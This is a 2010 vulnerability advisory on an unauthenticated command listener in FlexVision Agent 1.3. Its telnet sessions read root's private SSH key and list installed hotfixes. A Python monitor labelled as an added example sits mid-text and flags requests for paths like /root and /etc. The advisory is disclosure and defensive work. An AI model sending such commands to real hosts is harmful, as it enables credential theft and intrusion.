FlexVision Agent Listener Information Disclosure
Posted Dec 24, 2010
Authored by Victor Ribeiro Hora | Site tempest.com.br

FlexVision Agent Listener suffers from a remote information disclosure vulnerability.

tags | exploit, remote, info disclosure
SHA-256 | 10d250e92b0fd07125abb2f4cd4ac44589138f1aaa9cbeeb6cfd955f81706c6e

=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]=============

Information Disclosure Vulnerability in FlexVision Agent Listener
-----------------------------------------------------------------


Authors: Victor Ribeiro Hora <victor *SPAM* tempest.com.br
<http://tempest.com.br>>
Tempest Security Intelligence - Brazil


=====[ Table of Contents ]=================================

1. Overview
2. Detailed description
3. Other contexts & Solutions
4. Thanks
5. References


=====[ Overview ]======================================

* System affected: FlexVision Agent Listener 1.3 for Windows, Linux and
Solaris (other versions may be vulnerable)

* Release date: 22 October 2010

* Impact: Successful exploitation of this vulnerability may lead to
remote server sensitive information disclosure.

FlexVision [1] claims to be an IT service focused on hardware and
software management, offering features like capacity planning, SLA
monitoring and systems inventory. The service is used by several major
companies in Brazil, including banking, telecom, energy, health and
independent product sectors.

The vulnerability was found in the inventory agent listener or "fval".
Exploitation of this weakness does not require any authentication and
may lead to remote disclosure of sensitive information from the server
running the agent.

Specifically, an attacker can download non-binary files, and list
running services, running processes and installed software. It seems
there is some active filtering for known sensitive data, but other
sensitive information may leak.

=====[ Detailed description ]================================

FlexVision Inventory service has several agents (servers) to collect
data from different platforms and send them to a central console on the
network. These agents are installed on the hardware to be monitored and
listen for incoming client connections.

One of the agents that was analyzed is the "FlexVision Actions Listener
1.3 for Linux", used for the inventory of Linux systems. This agent is
executed by a Linux binary called "fval" started at boot time through an
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a
chdir() to /opt/flex/plugins, then it opens a socket listening for
connections on port 3810/TCP in daemon mode.

As soon as the TCP Three-Way Handshake is completed, the agent keeps
waiting for "commands" to perform the various inventory functions. These
commands are interpreted as internal functions of the fval binary, such
as help, version, exit or run.

Specifically, the run function expects a parameter. We noted that this
parameter is a bash script file in the /opt/flex/plugins directory. This
script is executed by the fval binary, and the output of the script is
returned on the same TCP connection to the central console application.
These commands are normally sent from a central console to the monitored
agent.

Since the connection is neither authenticated nor encrypted, any computer
that can reach port 3810/TCP on an agent can send commands that the agent
will execute.

Although the agent applies an active filter to some well-known sensitive
data (for example, the password hashes in the "shadow" file), other
sensitive data that is harder to predict can still be retrieved. Some of
the special characters we tested were also filtered, such as '*', ';'
and '>', as well as white space, tabs and other delimiters used by bash
and other shells.
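Because the agent itself performs no authentication, the only place a defender can catch misuse is on the wire. The following monitor is an added example (not part of the advisory or of FlexVision's software): it assumes a network sensor that exports one line per client request to a 3810/TCP listener in the constructed format `<timestamp> <src_ip> -> <dst_ip>:3810 <command line>`, and it flags requests that come from outside an assumed console whitelist or whose `run` arguments name directories that should never leave a host over this channel. The whitelist, the sensitive-path list and the sample lines are all constructed for illustration.

```python
"""Flag suspicious FVAL agent requests seen on the wire (added example).

Assumptions (not from the advisory): a sensor logs each request to a
3810/TCP listener as "<ts> <src> -> <dst>:3810 <command line>". The console
whitelist, sensitive-path list and sample lines below are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Assumed address(es) of the central console that legitimately drives agents.
CONSOLE_WHITELIST = [ipaddress.ip_network("10.0.0.10/32")]

# Directories whose contents should never be read through the agent
# (compared case-insensitively, with backslashes normalised to slashes).
SENSITIVE_PREFIXES = ("/root", "/etc", "/home", "c:/windows")

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s*->\s*(?P<dst>\S+):3810\s+(?P<cmd>.*)$"
)

# Constructed sample sensor lines (addresses mirror those in the advisory).
SAMPLE_LINES = [
    "2010-10-22T10:00:01 10.0.0.10 -> 192.168.1.1:3810 run hotfix.exe",
    "2010-10-22T10:00:05 192.168.1.50 -> 192.168.1.1:3810 help",
    "2010-10-22T10:00:09 192.168.1.50 -> 192.168.1.1:3810 run symonfile.sh /root/.ssh id_rsa",
    "2010-10-22T10:01:00 10.0.0.10 -> 192.168.1.1:3810 run symonfile.sh /etc shadow",
]


@dataclass
class Request:
    ts: str
    src: str
    dst: str
    cmd: str


@dataclass
class Alert:
    ts: str
    src: str
    dst: str
    cmd: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Return a Request for a well-formed sensor line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Request(m["ts"], m["src"], m["dst"], m["cmd"].strip())


def source_allowed(src):
    """True if src falls inside one of the whitelisted console networks."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in CONSOLE_WHITELIST)


def touches_sensitive_path(cmd):
    """True if a 'run' command passes an argument under a sensitive directory.

    parts[1] is the plugin script name; everything after it is passed to the
    script as arguments, so only those are inspected.
    """
    parts = cmd.split()
    if len(parts) < 2 or parts[0].lower() != "run":
        return False
    for arg in parts[2:]:
        a = arg.lower().replace("\\", "/")
        if any(a == p or a.startswith(p + "/") for p in SENSITIVE_PREFIXES):
            return True
    return False


def analyze(lines):
    """Return one Alert per request that violates at least one rule."""
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        reasons = []
        if not source_allowed(req.src):
            reasons.append("source not in console whitelist")
        if touches_sensitive_path(req.cmd):
            reasons.append("run argument names a sensitive path")
        if reasons:
            alerts.append(Alert(req.ts, req.src, req.dst, req.cmd, reasons))
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LINES):
        print(f"{a.ts} {a.src} -> {a.dst} [{a.cmd}]: {'; '.join(a.reasons)}")
```

The whitelist rule mirrors the source-IP restriction the vendor later shipped in version 1.4; keeping it on a sensor rather than only on the agent means a host that was reached before the update, or an agent whose whitelist was misconfigured, still produces an alert.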


The following is an example of the recovery of a private SSH RSA key
file that belongs to the root user on a Linux server:

-----------------------------------------------------------------------

vrh@victim01:~$ telnet 192.168.1.1 3810
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
FVAL>run symonfile.sh /root/.ssh id_rsa
-----BEGIN RSA PRIVATE KEY-----
[...]
-----------------------------------------------------------------------

Just like the Linux fval, the Windows version also allows any non-binary
file to be dumped. Note that since fval always runs as a privileged user
(Administrator/root), all system files are accessible and most of them
are readable.

Windows hosts behave similarly. As soon as the Agent is installed, it is
registered as a System Service and runs at boot time. This service runs
the fval binary located at %SystemDrive%\%ProgramFiles%\Flexvision.
Then, fval will run any file in the
%SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory.

By default, Windows fval has several 32bit Portable Executable (.EXE)
files to provide inventory data to the central console, but most
interesting is the hotfix.exe file, which lists all the installed
HotFixes on the host:

-----------------------------------------------------------------------

vrh@victim01:~$ telnet 192.168.1.2 3810
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
FVAL>run hotfix.exe
Hot Fix ID.75=File 1
Service pack afetado.75=KB956801
Instalado por.75=
Descricao.76=
Hot Fix ID.76=File 1
Service pack afetado.76=KB956806
Instalado por.76=
Descricao.77=
Hot Fix ID.77=File 1
Service pack afetado.77=KB956848
Instalado por.77=

-----------------------------------------------------------------------

With that sort of info it would be possible to plan and execute a much
more precise attack against the host.

=====[ Other contexts & Solutions ]============================

As usual [2], we contacted the vendor. After some weeks, they released
version 1.4, which uses source-IP-based access control (a whitelist
policy) and a static key for authentication, but nothing that addresses
the actual problem: there is still no strong authentication scheme and no
encryption of client-server traffic. Version 2.0 has just been released;
the vendor states that this version encrypts client-server
communication, but we have not been able to test it so far. After waiting
a few months, FlexVision has not provided us with a public URL for an
actual fix addressing this problem to attach to this publication.

=====[ Thanks ]========================================

- Tempest Security Intelligence [3] - Tempest MSS Team
- Evandro Curvelo Hora <evandro *SPAM* tempest.com.br
<http://tempest.com.br>>
- Marco "Kiko" Carnut <kiko *SPAM* tempest.com.br <http://tempest.com.br>>
- Cristiano Lincoln Mattos <lincoln *SPAM* tempest.com.br
<http://tempest.com.br>>
- Aldo Albuquerque <aldo *SPAM* tempest.com.br <http://tempest.com.br>>

=====[ References ]======================================

[1] http://www.flexvision.com.br/
[2] http://www.cert.org/kb/vul_disclosure.html
[3] http://www.tempest.com.br/

===================================================

--
Victor Ribeiro Hora <victor@tempest.com.br>
Network Security Analyst & Security Baselines development
Tempest Security Intelligence
www.tempest.com.br
